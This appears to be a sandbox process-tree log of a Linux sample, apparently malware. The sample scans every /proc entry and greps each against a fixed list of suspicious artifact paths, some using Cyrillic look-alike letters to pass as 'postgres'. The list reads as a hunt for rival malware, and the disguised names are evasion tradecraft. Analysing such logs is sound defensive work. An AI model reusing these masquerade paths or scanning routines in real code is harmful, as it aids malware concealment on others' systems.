/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1003
-
-
/bin/lsls -latrh /proc/6322⤵PID:1006
-
-
/bin/grepgrep exe2⤵PID:1007
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1009
-
-
/bin/grepgrep exe2⤵PID:1013
-
-
/bin/lsls -latrh /proc/6382⤵PID:1012
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1016
-
-
/bin/lsls -latrh /proc/6392⤵PID:1019
-
-
/bin/grepgrep exe2⤵PID:1020
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1023
-
-
/bin/lsls -latrh /proc/6432⤵PID:1025
-
-
/bin/grepgrep exe2⤵PID:1026
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1030
-
-
/bin/lsls -latrh /proc/6442⤵PID:1032
-
-
/bin/grepgrep exe2⤵PID:1033
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1036
-
-
/bin/grepgrep exe2⤵PID:1040
-
-
/bin/lsls -latrh /proc/6452⤵PID:1039
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1042
-
-
/bin/lsls -latrh /proc/6462⤵PID:1046
-
-
/bin/grepgrep exe2⤵PID:1047
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1050
-
-
/bin/lsls -latrh /proc/6512⤵PID:1055
-
-
/bin/grepgrep exe2⤵PID:1056
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1058
-
-
/bin/lsls -latrh /proc/6542⤵PID:1060
-
-
/bin/grepgrep exe2⤵PID:1061
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1065
-
-
/bin/grepgrep exe2⤵PID:1068
-
-
/bin/lsls -latrh /proc/6592⤵PID:1067
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1070
-
-
/bin/lsls -latrh /proc/6652⤵PID:1073
-
-
/bin/grepgrep exe2⤵PID:1074
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1078
-
-
/bin/grepgrep exe2⤵PID:1082
-
-
/bin/lsls -latrh /proc/72⤵PID:1081
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1084
-
-
/bin/grepgrep exe2⤵PID:1087
-
-
/bin/lsls -latrh /proc/752⤵PID:1086
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1089
-
-
/bin/lsls -latrh /proc/82⤵PID:1091
-
-
/bin/grepgrep exe2⤵PID:1092
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1094
-
-
/bin/grepgrep exe2⤵PID:1097
-
-
/bin/lsls -latrh /proc/92⤵PID:1096
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1099
-
-
/bin/grepgrep exe2⤵PID:1102
-
-
/bin/lsls -latrh /proc/972⤵PID:1101
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1104
-
-
/bin/grepgrep exe2⤵PID:1107
-
-
/bin/lsls -latrh /proc/apm2⤵PID:1106
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1109
-
-
/bin/grepgrep exe2⤵PID:1112
-
-
/bin/lsls -latrh /proc/buddyinfo2⤵PID:1111
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1114
-
-
/bin/lsls -latrh /proc/bus2⤵PID:1116
-
-
/bin/grepgrep exe2⤵PID:1117
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1119
-
-
/bin/grepgrep exe2⤵PID:1122
-
-
/bin/lsls -latrh /proc/cgroups2⤵PID:1121
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1124
-
-
/bin/grepgrep exe2⤵PID:1127
-
-
/bin/lsls -latrh /proc/cmdline2⤵PID:1126
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1129
-
-
/bin/lsls -latrh /proc/consoles2⤵PID:1131
-
-
/bin/grepgrep exe2⤵PID:1132
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1134
-
-
/bin/grepgrep exe2⤵PID:1137
-
-
/bin/lsls -latrh /proc/cpu2⤵PID:1136
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1139
-
-
/bin/grepgrep exe2⤵PID:1142
-
-
/bin/lsls -latrh /proc/cpuinfo2⤵PID:1141
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1144
-
-
/bin/grepgrep exe2⤵PID:1147
-
-
/bin/lsls -latrh /proc/crypto2⤵PID:1146
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1149
-
-
/bin/lsls -latrh /proc/devices2⤵PID:1151
-
-
/bin/grepgrep exe2⤵PID:1152
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1154
-
-
/bin/grepgrep exe2⤵PID:1157
-
-
/bin/lsls -latrh /proc/device-tree2⤵PID:1156
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1159
-
-
/bin/grepgrep exe2⤵PID:1162
-
-
/bin/lsls -latrh /proc/diskstats2⤵PID:1161
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1164
-
-
/bin/grepgrep exe2⤵PID:1167
-
-
/bin/lsls -latrh /proc/driver2⤵PID:1166
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1169
-
-
/bin/grepgrep exe2⤵PID:1172
-
-
/bin/lsls -latrh /proc/execdomains2⤵PID:1171
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1174
-
-
/bin/grepgrep exe2⤵PID:1177
-
-
/bin/lsls -latrh /proc/fb2⤵PID:1176
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1179
-
-
/bin/grepgrep exe2⤵PID:1182
-
-
/bin/lsls -latrh /proc/filesystems2⤵PID:1181
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1184
-
-
/bin/grepgrep exe2⤵PID:1187
-
-
/bin/lsls -latrh /proc/fs2⤵PID:1186
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1189
-
-
/bin/lsls -latrh /proc/interrupts2⤵PID:1191
-
-
/bin/grepgrep exe2⤵PID:1192
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1194
-
-
/bin/grepgrep exe2⤵PID:1197
-
-
/bin/lsls -latrh /proc/iomem2⤵PID:1196
-
-
